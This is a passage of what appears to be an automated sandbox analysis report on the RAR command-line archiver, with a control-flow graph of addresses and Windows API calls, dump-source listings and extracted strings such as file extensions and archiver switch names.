7ff7cf897b61 GetConsoleMode 39225->39226 39227 7ff7cf897a9e 39225->39227 39226->39227 39227->39203 39228->39210 39229->39209 39230->39213 39231->39206 39232->39220 39233->39224 39234->39224 39235 7ff7cf8e231c 39236 7ff7cf8e2342 GetModuleHandleW 39235->39236 39237 7ff7cf8e238c 39235->39237 39236->39237 39240 7ff7cf8e234f 39236->39240 39248 7ff7cf8e6938 EnterCriticalSection 39237->39248 39239 7ff7cf8e6998 fflush LeaveCriticalSection 39241 7ff7cf8e2460 39239->39241 39240->39237 39249 7ff7cf8e24d4 GetModuleHandleExW 39240->39249 39243 7ff7cf8e246c 39241->39243 39244 7ff7cf8e2488 11 API calls 39241->39244 39242 7ff7cf8e2396 39245 7ff7cf8e43b8 16 API calls 39242->39245 39247 7ff7cf8e2410 39242->39247 39244->39243 39245->39247 39247->39239 39250 7ff7cf8e2525 39249->39250 39251 7ff7cf8e24fe GetProcAddress 39249->39251 39252 7ff7cf8e2535 39250->39252 39253 7ff7cf8e252f FreeLibrary 39250->39253 39251->39250 39254 7ff7cf8e2518 39251->39254 39252->39237 39253->39252 39254->39250 39255 7ff7cf881884 39387 7ff7cf8b34e4 39255->39387 39258 7ff7cf8b34e4 CompareStringW 39260 7ff7cf8818a6 39258->39260 39259 7ff7cf881926 39261 7ff7cf88195b 39259->39261 39451 7ff7cf8b3f98 63 API calls 2 library calls 39259->39451 39262 7ff7cf8b34e4 CompareStringW 39260->39262 39268 7ff7cf8818b9 39260->39268 39269 7ff7cf881970 39261->39269 39452 7ff7cf8a2ed8 100 API calls 3 library calls 39261->39452 39262->39268 39266 7ff7cf881915 39450 7ff7cf89ca40 61 API calls _CxxThrowException 39266->39450 39268->39259 39449 7ff7cf881168 8 API calls 2 library calls 39268->39449 39270 7ff7cf8819b8 39269->39270 39453 7ff7cf8c49f4 48 API calls 39269->39453 39391 7ff7cf885450 39270->39391 39272 7ff7cf8819b0 39454 7ff7cf898444 54 API calls fflush 39272->39454 39278 7ff7cf8872c4 76 API calls 39285 7ff7cf881a12 39278->39285 39279 7ff7cf881ae6 39425 7ff7cf887514 39279->39425 39280 7ff7cf881b04 39429 7ff7cf896c94 39280->39429 39283 7ff7cf881af2 39284 7ff7cf887514 72 API calls 39283->39284 39286 7ff7cf881aff 39284->39286 39285->39279 39285->39280 39287 7ff7cf8da610 _handle_error 8 API calls 39286->39287 39288 7ff7cf882f97 39287->39288 39289 7ff7cf881b13 39445 7ff7cf887148 39289->39445 39291 7ff7cf881c71 39292 7ff7cf881ca7 39291->39292 39293 7ff7cf8863e8 8 API calls 39291->39293 39295 7ff7cf881cd5 39292->39295 39296 7ff7cf881ce4 39292->39296 39294 7ff7cf881c91 39293->39294 39297 7ff7cf8849b8 99 API calls 39294->39297 39298 7ff7cf8da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39295->39298 39299 7ff7cf8da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39296->39299 39300 7ff7cf881c9d 39297->39300 39302 7ff7cf881cee 39298->39302 39299->39302 39301 7ff7cf8863e8 8 API calls 39300->39301 39301->39292 39303 7ff7cf881d50 39302->39303 39305 7ff7cf8cde30 72 API calls 39302->39305 39304 7ff7cf8da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39303->39304 39306 7ff7cf881d62 39304->39306 39305->39303 39307 7ff7cf8cdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39306->39307 39308 7ff7cf881d7b 39306->39308 39307->39308 39309 7ff7cf8d2bcc 66 API calls 39308->39309 39310 7ff7cf881dba 39309->39310 39383 7ff7cf8aae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39310->39383 39311 7ff7cf881e1c 39313 7ff7cf8810c0 8 API calls 39311->39313 39315 7ff7cf881e5d 39311->39315 39312 7ff7cf881dde std::bad_alloc::bad_alloc 39312->39311 39314 7ff7cf8dba34 _CxxThrowException RtlPcToFileHeader RaiseException 39312->39314 39313->39315 39314->39311 39316 7ff7cf88a410 159 API calls 39315->39316 39369 7ff7cf881ef4 39315->39369 39316->39369 39317 7ff7cf882d0c 39319 7ff7cf8cde30 72 API calls 39317->39319 39324 7ff7cf882d21 39317->39324 39318 7ff7cf882ccc 39318->39317 39382 7ff7cf8a8c80 72 API calls 39318->39382 39319->39324 39320 7ff7cf8c49f4 48 API calls 39357 7ff7cf882005 39320->39357 39321 7ff7cf8a6688 48 API calls 39321->39369 39322 7ff7cf882d86 39325 7ff7cf8c49f4 48 API calls 39322->39325 39362 7ff7cf882dd0 39322->39362 39323 7ff7cf885e70 169 API calls 39323->39357 39324->39322 39328 7ff7cf8c49f4 48 API calls 39324->39328 39330 7ff7cf882d9e 39325->39330 39326 7ff7cf88a504 208 API calls 39326->39362 39327 7ff7cf8880e4 192 API calls 39327->39362 39332 7ff7cf882d6c 39328->39332 39329 7ff7cf885928 237 API calls 39329->39357 39334 7ff7cf898444 54 API calls 39330->39334 39331 7ff7cf8a7c7c 127 API calls 39331->39362 39335 7ff7cf8c49f4 48 API calls 39332->39335 39333 7ff7cf88a410 159 API calls 39333->39369 39336 7ff7cf882da6 39334->39336 39340 7ff7cf882d79 39335->39340 39343 7ff7cf8a1c24 12 API calls 39336->39343 39337 7ff7cf89e21c 63 API calls 39337->39357 39338 7ff7cf881168 8 API calls 39338->39362 39339 7ff7cf88b540 147 API calls 39339->39369 39342 7ff7cf898444 54 API calls 39340->39342 39341 7ff7cf88e6c8 157 API calls 39341->39369 39342->39322 39343->39362 39344 7ff7cf8a65b4 48 API calls 39344->39369 39345 7ff7cf8a1998 138 API calls 39345->39369 39346 7ff7cf8cae50 71 API calls 39350 7ff7cf882e39 39346->39350 39347 7ff7cf8a4554 16 API calls 39347->39369 39348 7ff7cf8833b4 64 API calls 39348->39362 39349 7ff7cf885db4 46 API calls 39349->39369 39350->39346 39351 7ff7cf89ca40 61 API calls 39350->39351 39350->39362 39351->39362 39352 7ff7cf886188 231 API calls 39352->39362 39353 7ff7cf8a1930 11 API calls 39353->39369 39354 7ff7cf883f74 138 API calls 39354->39362 39355 7ff7cf88b540 147 API calls 39355->39357 39356 7ff7cf8a7c7c 127 API calls 39356->39369 39357->39320 39357->39323 39357->39329 39357->39337 39357->39355 39357->39369 39378 7ff7cf8cb6d0 73 API calls 39357->39378 39381 7ff7cf898444 54 API calls 39357->39381 39358 7ff7cf88571c 12 API calls 39358->39369 39359 7ff7cf8bba9c 195 API calls 39359->39362 39360 7ff7cf8c49f4 48 API calls 39360->39362 39361 7ff7cf885004 49 API calls 39361->39369 39362->39326 39362->39327 39362->39331 39362->39338 39362->39348 39362->39350 39362->39352 39362->39354 39362->39359 39362->39360 39363 7ff7cf898444 54 API calls 39362->39363 39363->39362 39364 7ff7cf88a4d0 12 API calls 39364->39369 39365 7ff7cf8a1e80 15 API calls 39365->39369 39366 7ff7cf881168 8 API calls 39366->39369 39367 7ff7cf8a18ac 15 API calls 39367->39369 39368 7ff7cf8cd48c 58 API calls 39368->39369 39369->39318 39369->39321 39369->39333 39369->39339 39369->39341 39369->39344 39369->39345 39369->39347 39369->39349 39369->39353 39369->39356 39369->39357 39369->39358 39369->39361 39369->39364 39369->39365 39369->39366 39369->39367 39369->39368 39370 7ff7cf885e70 169 API calls 39369->39370 39371 7ff7cf8cc0a8 10 API calls 39369->39371 39372 7ff7cf899be0 14 API calls 39369->39372 39373 7ff7cf8a6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39369->39373 39374 7ff7cf8b97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39369->39374 39375 7ff7cf89cbd0 75 API calls 39369->39375 39376 7ff7cf8a5c0c 237 API calls 39369->39376 39377 7ff7cf8a5d40 237 API calls 39369->39377 39379 7ff7cf886114 216 API calls 39369->39379 39380 7ff7cf8a5708 237 API calls 39369->39380 39384 7ff7cf8aa250 237 API calls 39369->39384 39385 7ff7cf890d60 237 API calls 39369->39385 39386 7ff7cf8aaae0 237 API calls 39369->39386 39370->39369 39371->39369 39372->39369 39373->39369 39374->39369 39375->39369 39376->39369 39377->39369 39378->39357 39379->39369 39380->39369 39381->39357 39382->39317 39383->39312 39384->39369 39385->39357 39386->39357 39388 7ff7cf8b34f6 39387->39388 39389 7ff7cf881893 39388->39389 39455 7ff7cf8cdac0 CompareStringW 39388->39455 39389->39258 39389->39268 39392 7ff7cf88546f setbuf 39391->39392 39393 7ff7cf88554a memcpy_s 39392->39393 39409 7ff7cf885588 memcpy_s 39392->39409 39395 7ff7cf8cc0a8 10 API calls 39393->39395 39397 7ff7cf885576 39395->39397 39396 7ff7cf885583 39485 7ff7cf886eb8 39396->39485 39400 7ff7cf88681c 54 API calls 39397->39400 39400->39396 39401 7ff7cf8856e9 39492 7ff7cf8c6f68 39401->39492 39403 7ff7cf8856f6 39404 7ff7cf8da610 _handle_error 8 API calls 39403->39404 39405 7ff7cf8819df 39404->39405 39411 7ff7cf8872c4 39405->39411 39409->39396 39456 7ff7cf883210 39409->39456 39462 7ff7cf897088 39409->39462 39466 7ff7cf88681c 39409->39466 39477 7ff7cf8c7a24 39409->39477 39496 7ff7cf88571c 39409->39496 39504 7ff7cf894380 14 API calls 39409->39504 39412 7ff7cf8872eb 39411->39412 39614 7ff7cf8988dc 39412->39614 39414 7ff7cf887302 39618 7ff7cf8b915c 39414->39618 39416 7ff7cf88730f 39630 7ff7cf8b7044 39416->39630 39419 7ff7cf8da444 new 4 API calls 39420 7ff7cf8873e3 39419->39420 39422 7ff7cf8873f5 memcpy_s 39420->39422 39635 7ff7cf8a894c 39420->39635 39423 7ff7cf899be0 14 API calls 39422->39423 39424 7ff7cf881a01 39423->39424 39424->39278 39426 7ff7cf887539 39425->39426 39661 7ff7cf8b922c 39426->39661 39431 7ff7cf896d45 39429->39431 39432 7ff7cf896cbc 39429->39432 39430 7ff7cf896d83 39430->39289 39431->39430 39434 7ff7cf896d69 39431->39434 39677 7ff7cf8b9f78 8 API calls 2 library calls 39431->39677 39433 7ff7cf896cd9 39432->39433 39672 7ff7cf8b9f78 8 API calls 2 library calls 39432->39672 39436 7ff7cf896cf3 39433->39436 39673 7ff7cf8b9f78 8 API calls 2 library calls 39433->39673 39434->39430 39678 7ff7cf8b9f78 8 API calls 2 library calls 39434->39678 39439 7ff7cf896d0d 39436->39439 39674 7ff7cf8b9f78 8 API calls 2 library calls 39436->39674 39442 7ff7cf896d2b 39439->39442 39675 7ff7cf8b9f78 8 API calls 2 library calls 39439->39675 39442->39430 39676 7ff7cf8b9f78 8 API calls 2 library calls 39442->39676 39446 7ff7cf887167 39445->39446 39447 7ff7cf887162 39445->39447 39679 7ff7cf886c64 130 API calls _handle_error 39447->39679 39449->39266 39450->39259 39451->39261 39452->39269 39453->39272 39454->39270 39455->39389 39457 7ff7cf883231 39456->39457 39461 7ff7cf8832e9 39456->39461 39457->39461 39505 7ff7cf894380 14 API calls 39457->39505 39459 7ff7cf88329c 39459->39461 39506 7ff7cf8a2a20 22 API calls 2 library calls 39459->39506 39461->39409 39463 7ff7cf8970a4 39462->39463 39464 7ff7cf8970c5 39463->39464 39507 7ff7cf8a8558 10 API calls 2 library calls 39463->39507 39464->39409 39508 7ff7cf886714 39466->39508 39468 7ff7cf886836 39469 7ff7cf886853 39468->39469 39519 7ff7cf8e48c0 31 API calls _invalid_parameter_noinfo 39468->39519 39469->39409 39471 7ff7cf88684b 39471->39469 39472 7ff7cf8868a9 std::bad_alloc::bad_alloc 39471->39472 39520 7ff7cf8dba34 RtlPcToFileHeader RaiseException 39472->39520 39474 7ff7cf8868c4 39521 7ff7cf887188 12 API calls 39474->39521 39476 7ff7cf8868eb 39476->39409 39482 7ff7cf8c7a4f 39477->39482 39483 7ff7cf8c7a59 39477->39483 39478 7ff7cf8c7a7c 39558 7ff7cf8cb6d0 73 API calls _Init_thread_footer 39478->39558 39481 7ff7cf8c7b1c 60 API calls 39481->39483 39482->39409 39483->39478 39483->39481 39483->39482 39526 7ff7cf8c71fc 39483->39526 39559 7ff7cf8941b0 14 API calls 2 library calls 39483->39559 39486 7ff7cf886ee6 39485->39486 39487 7ff7cf886f5c 39485->39487 39607 7ff7cf8c9f64 8 API calls memcpy_s 39486->39607 39487->39401 39489 7ff7cf886efb 39489->39487 39490 7ff7cf886f2f 39489->39490 39490->39489 39608 7ff7cf887188 12 API calls 39490->39608 39493 7ff7cf8c6fb4 39492->39493 39495 7ff7cf8c6f8a 39492->39495 39494 7ff7cf8a4538 FindClose 39494->39495 39495->39493 39495->39494 39497 7ff7cf885742 39496->39497 39503 7ff7cf88575d 39496->39503 39497->39503 39613 7ff7cf8b3520 12 API calls 2 library calls 39497->39613 39501 7ff7cf8857fc 39501->39409 39502 7ff7cf8b48bc 8 API calls 39502->39501 39609 7ff7cf8b3610 39503->39609 39504->39409 39505->39459 39506->39461 39507->39463 39509 7ff7cf886738 39508->39509 39518 7ff7cf8867a7 memcpy_s 39508->39518 39510 7ff7cf886765 39509->39510 39522 7ff7cf89ca6c 48 API calls 3 library calls 39509->39522 39514 7ff7cf8867e1 39510->39514 39515 7ff7cf886786 39510->39515 39512 7ff7cf886759 39523 7ff7cf89cb64 8 API calls 39512->39523 39514->39518 39525 7ff7cf89cb64 8 API calls 39514->39525 39515->39518 39524 7ff7cf89cb64 8 API calls 39515->39524 39518->39468 39519->39471 39520->39474 39521->39476 39522->39512 39532 7ff7cf8c7217 setbuf 39526->39532 39527 7ff7cf8da610 _handle_error 8 API calls 39529 7ff7cf8c776f 39527->39529 39529->39483 39531 7ff7cf8c7453 39533 7ff7cf8c7476 39531->39533 39534 7ff7cf8c7464 39531->39534 39541 7ff7cf8c729c 39532->39541 39549 7ff7cf8c725a 39532->39549 39552 7ff7cf8c73c5 39532->39552 39567 7ff7cf8a4554 39532->39567 39553 7ff7cf8c7496 39533->39553 39564 7ff7cf8a4538 39533->39564 39575 7ff7cf8c7c38 55 API calls 3 library calls 39534->39575 39537 7ff7cf8c7342 39537->39549 39554 7ff7cf8c7656 39537->39554 39557 7ff7cf8c76ef 39537->39557 39576 7ff7cf894380 14 API calls 39537->39576 39538 7ff7cf8c7471 39538->39533 39543 7ff7cf8c73bb 39541->39543 39545 7ff7cf8c732e 39541->39545 39544 7ff7cf8da444 new 4 API calls 39543->39544 39544->39552 39545->39537 39546 7ff7cf8c734a 39545->39546 39548 7ff7cf8c737e 39546->39548 39546->39549 39573 7ff7cf894380 14 API calls 39546->39573 39547 7ff7cf8a4554 16 API calls 39547->39549 39548->39549 39574 7ff7cf89cbd0 75 API calls 39548->39574 39549->39527 39560 7ff7cf8a45cc 39552->39560 39553->39547 39553->39549 39554->39549 39554->39554 39555 7ff7cf8c7723 39554->39555 39554->39557 39577 7ff7cf88c214 8 API calls 2 library calls 39555->39577 39557->39549 39578 7ff7cf8a8558 10 API calls 2 library calls 39557->39578 39559->39483 39563 7ff7cf8a45ed 39560->39563 39561 7ff7cf8a46b2 39561->39531 39561->39537 39562 7ff7cf8a46ec 15 API calls 39562->39563 39563->39561 39563->39562 39565 7ff7cf8a454f 39564->39565 39566 7ff7cf8a4549 FindClose 39564->39566 39565->39553 39566->39565 39568 7ff7cf8a4570 39567->39568 39572 7ff7cf8a4574 39568->39572 39579 7ff7cf8a46ec 39568->39579 39571 7ff7cf8a458d FindClose 39571->39572 39572->39541 39573->39548 39574->39549 39575->39538 39576->39554 39577->39549 39578->39549 39580 7ff7cf8a4705 setbuf 39579->39580 39581 7ff7cf8a47a4 FindNextFileW 39580->39581 39582 7ff7cf8a4733 FindFirstFileW 39580->39582 39584 7ff7cf8a47ae GetLastError 39581->39584 39591 7ff7cf8a478b 39581->39591 39583 7ff7cf8a4749 39582->39583 39582->39591 39592 7ff7cf8b4534 39583->39592 39584->39591 39587 7ff7cf8da610 _handle_error 8 API calls 39590 7ff7cf8a4587 39587->39590 39588 7ff7cf8a475f FindFirstFileW 39589 7ff7cf8a477a GetLastError 39588->39589 39588->39591 39589->39591 39590->39571 39590->39572 39591->39587 39593 7ff7cf8b4549 setbuf 39592->39593 39603 7ff7cf8b45a2 39593->39603 39604 7ff7cf8b472c CharUpperW 39593->39604 39595 7ff7cf8b4579 39605 7ff7cf8b4760 CharUpperW 39595->39605 39596 7ff7cf8da610 _handle_error 8 API calls 39597 7ff7cf8a475b 39596->39597 39597->39588 39597->39589 39599 7ff7cf8b4592 39600 7ff7cf8b4629 GetCurrentDirectoryW 39599->39600 39601 7ff7cf8b459a 39599->39601 39600->39603 39606 7ff7cf8b472c CharUpperW 39601->39606 39603->39596 39604->39595 39605->39599 39606->39603 39607->39489 39608->39490 39612 7ff7cf8b3626 setbuf wcschr 39609->39612 39610 7ff7cf8da610 _handle_error 8 API calls 39611 7ff7cf8857e1 39610->39611 39611->39501 39611->39502 39612->39610 39613->39503 39615 7ff7cf898919 39614->39615 39640 7ff7cf8c4b14 39615->39640 39617 7ff7cf898954 memcpy_s 39617->39414 39619 7ff7cf8b9199 39618->39619 39620 7ff7cf8da480 4 API calls 39619->39620 39621 7ff7cf8b91be 39620->39621 39622 7ff7cf8da444 new 4 API calls 39621->39622 39623 7ff7cf8b91cf 39622->39623 39624 7ff7cf8b91e1 39623->39624 39625 7ff7cf8988dc 8 API calls 39623->39625 39626 7ff7cf8da444 new 4 API calls 39624->39626 39625->39624 39627 7ff7cf8b91f7 39626->39627 39628 7ff7cf8b9209 39627->39628 39629 7ff7cf8988dc 8 API calls 39627->39629 39628->39416 39629->39628 39631 7ff7cf8988dc 8 API calls 39630->39631 39632 7ff7cf8b7063 39631->39632 39633 7ff7cf8b72c0 4 API calls 39632->39633 39634 7ff7cf887325 39633->39634 39634->39419 39634->39422 39645 7ff7cf8c7d80 39635->39645 39641 7ff7cf8c4b26 39640->39641 39642 7ff7cf8c4b2b 39640->39642 39644 7ff7cf8c4b38 8 API calls _handle_error 39641->39644 39642->39617 39644->39642 39652 7ff7cf8c8094 39645->39652 39648 7ff7cf8a8a44 39649 7ff7cf8a8a5a memcpy_s 39648->39649 39656 7ff7cf8cbac4 39649->39656 39653 7ff7cf8c809f 39652->39653 39654 7ff7cf8c7ec8 68 API calls 39653->39654 39655 7ff7cf8a896e 39654->39655 39655->39648 39659 7ff7cf8cba70 GetCurrentProcess GetProcessAffinityMask 39656->39659 39660 7ff7cf8a89c5 39659->39660 39660->39422 39662 7ff7cf8b9245 39661->39662 39669 7ff7cf8a6194 72 API calls 39662->39669 39664 7ff7cf8b92b1 39670 7ff7cf8a6194 72 API calls 39664->39670 39666 7ff7cf8b92bd 39671 7ff7cf8a6194 72 API calls 39666->39671 39668 7ff7cf8b92c9 39669->39664 39670->39666 39671->39668 39672->39433 39673->39436 39674->39439 39675->39442 39676->39431 39677->39434 39678->39430 39679->39446 39680 7ff7cf883b53 39681 7ff7cf883b64 39680->39681 39730 7ff7cf8a1e80 39681->39730 39683 7ff7cf883bb6 39684 7ff7cf883c18 39683->39684 39685 7ff7cf883c01 39683->39685 39690 7ff7cf883c09 39683->39690 39747 7ff7cf888050 157 API calls 39684->39747 39688 7ff7cf8a1c24 12 API calls 39685->39688 39687 7ff7cf883ccc 39712 7ff7cf883c90 39687->39712 39755 7ff7cf8a2414 61 API calls 39687->39755 39688->39690 39689 7ff7cf883c3d 39748 7ff7cf888010 13 API calls 39689->39748 39742 7ff7cf8a23f0 39690->39742 39693 7ff7cf883c45 39696 7ff7cf883c54 39693->39696 39749 7ff7cf89cba8 75 API calls 39693->39749 39695 7ff7cf883cf9 39756 7ff7cf8a1998 138 API calls 39695->39756 39750 7ff7cf88a9d4 186 API calls wcschr 39696->39750 39700 7ff7cf883d10 39702 7ff7cf8a18ac 15 API calls 39700->39702 39701 7ff7cf883c5c 39751 7ff7cf8893ac 8 API calls 39701->39751 39702->39712 39704 7ff7cf883c66 39706 7ff7cf883c77 39704->39706 39752 7ff7cf89ca40 61 API calls _CxxThrowException 39704->39752 39753 7ff7cf888090 8 API calls 39706->39753 39709 7ff7cf883c7f 39709->39712 39754 7ff7cf89ca40 61 API calls _CxxThrowException 39709->39754 39757 7ff7cf8cd400 48 API calls 39712->39757 39731 7ff7cf8a1e95 setbuf 39730->39731 39732 7ff7cf8a1ecb CreateFileW 39731->39732 39733 7ff7cf8a1f59 GetLastError 39732->39733 39734 7ff7cf8a1fb8 39732->39734 39735 7ff7cf8b4534 10 API calls 39733->39735 39736 7ff7cf8a1fd9 SetFileTime 39734->39736 39737 7ff7cf8a1ff7 39734->39737 39738 7ff7cf8a1f74 39735->39738 39736->39737 39739 7ff7cf8da610 _handle_error 8 API calls 39737->39739 39738->39734 39740 7ff7cf8a1f78 CreateFileW GetLastError 39738->39740 39741 7ff7cf8a203a 39739->39741 39740->39734 39741->39683 39758 7ff7cf8a24e8 39742->39758 39745 7ff7cf8a240e 39745->39687 39747->39689 39748->39693 39750->39701 39751->39704 39752->39706 39753->39709 39754->39712 39755->39695 39756->39700 39764 7ff7cf8a1af0 39758->39764 39761 7ff7cf8a23f9 39761->39745 39763 7ff7cf89ca40 61 API calls _CxxThrowException 39761->39763 39763->39745 39765 7ff7cf8a1b01 setbuf 39764->39765 39766 7ff7cf8a1b6f CreateFileW 39765->39766 39767 7ff7cf8a1b68 39765->39767 39766->39767 39768 7ff7cf8a1be1 39767->39768 39769 7ff7cf8b4534 10 API calls 39767->39769 39772 7ff7cf8da610 _handle_error 8 API calls 39768->39772 39770 7ff7cf8a1bb3 39769->39770 39770->39768 39771 7ff7cf8a1bb7 CreateFileW 39770->39771 39771->39768 39773 7ff7cf8a1c14 39772->39773 39773->39761 39774 7ff7cf89ca08 10 API calls 39773->39774 39774->39761 39775 7ff7cf883e71 39776 7ff7cf883e81 39775->39776 39779 7ff7cf883e89 39775->39779 39786 7ff7cf8d9a14 49 API calls 39776->39786 39778 7ff7cf883edd 39782 7ff7cf8da610 _handle_error 8 API calls 39778->39782 39779->39778 39780 7ff7cf883ea3 39779->39780 39787 7ff7cf8a331c 48 API calls 2 library calls 39780->39787 39784 7ff7cf883eef 39782->39784 39783 7ff7cf883eab 39783->39778 39788 7ff7cf8863e8 8 API calls 2 library calls 39783->39788 39786->39779 39787->39783 39788->39778
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                              • API String ID: 0-1628410872
                                                                                                                                                                                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction ID: 8700fe038dc01d714b0ba7ec0b3bb7450f82de7f86915dbe0814476613b505db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99C2A03290C2D285EB64BF2481452FDA6E1AF017B4FD98135CA0E4B2C9DE6DF765A370
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                              • API String ID: 0-1660254149
                                                                                                                                                                                                                              • Opcode ID: 78da4f876d830a6de95fab3adc7b8bfa4f2541ae6f304559d8ec8eb83d3802cb
                                                                                                                                                                                                                              • Instruction ID: 1a9ccb1700cfd304ef68c8c6d220fd0c784b0bef1be25e58debd434a4b1764cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78da4f876d830a6de95fab3adc7b8bfa4f2541ae6f304559d8ec8eb83d3802cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11E2B126A09AC28AEB20EF25D8401FDA7E1FB457A8FC54036CA4D47796DF39E564D330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8C4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF7CF89CC90), ref: 00007FF7CF8C4AF5
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C492E
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C496A
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4993
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C499F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
